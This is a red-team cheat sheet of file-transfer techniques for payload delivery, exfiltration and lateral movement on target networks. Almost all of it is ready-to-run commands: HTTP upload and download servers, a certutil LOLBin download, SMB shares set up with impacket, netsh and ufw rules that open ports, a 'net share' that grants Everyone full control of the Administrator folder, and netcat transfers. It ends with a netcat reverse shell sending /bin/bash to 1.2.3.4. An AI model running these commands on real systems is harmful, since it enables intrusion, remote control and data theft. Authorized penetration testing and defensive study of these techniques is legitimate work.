File transfer is a critical capability during red team operations, whether for payload delivery, data exfiltration, lateral movement, or post-exploitation tooling. However, moving files within a target environment is often constrained by network segmentation, egress filtering, endpoint protections, and logging mechanisms. Selecting the wrong transfer method can quickly expose an operation or trigger defensive controls.
This cheat sheet provides practical file transfer techniques tailored for red team engagements, covering common protocols, living-off-the-land binaries (LOLBins), covert channels, and environment-specific trade-offs.
HTTP
Upload Server
netsh advfirewall firewall add rule name="TMP: Allow Upload of file" dir=in action=allow protocol=TCP localport=<port>
python3 -m uploadserver <port>
sudo ufw allow <port>/tcp comment 'TMP: Allow Upload of file'
python3 -m uploadserver <port>
Download Server
python3 -m http.server 80
certutil.exe -urlcache -f <url> <filename>
wget <url>
SCP
scp file.txt [email protected]:/remote/directory
scp [email protected]:/remote/directory/file.txt ./
SMB
impacket-smbserver LUN . -smb2support
impacket-smbserver LUN . -user lun -password lun -smb2support &
net use L: \\<IP>\LUN /user:lun lun
cp ./file.txt L:\
sudo mount -t cifs //<IP>/LUN /tmp/share
sudo mount -t cifs -o 'username=lun,password=lun' //<IP>/LUN /tmp/share
net share LUN=C:\Users\Administrator /GRANT:Everyone,FULL
Netcat
Envoyer :
nc -nv <IP> 4444 < file.exe
Recevoir :
nc -nlvp 4444 > file.exe
👺 Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that…
whereis nc
nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
/bin/nc.traditional -e /bin/bash 1.2.3.4 4444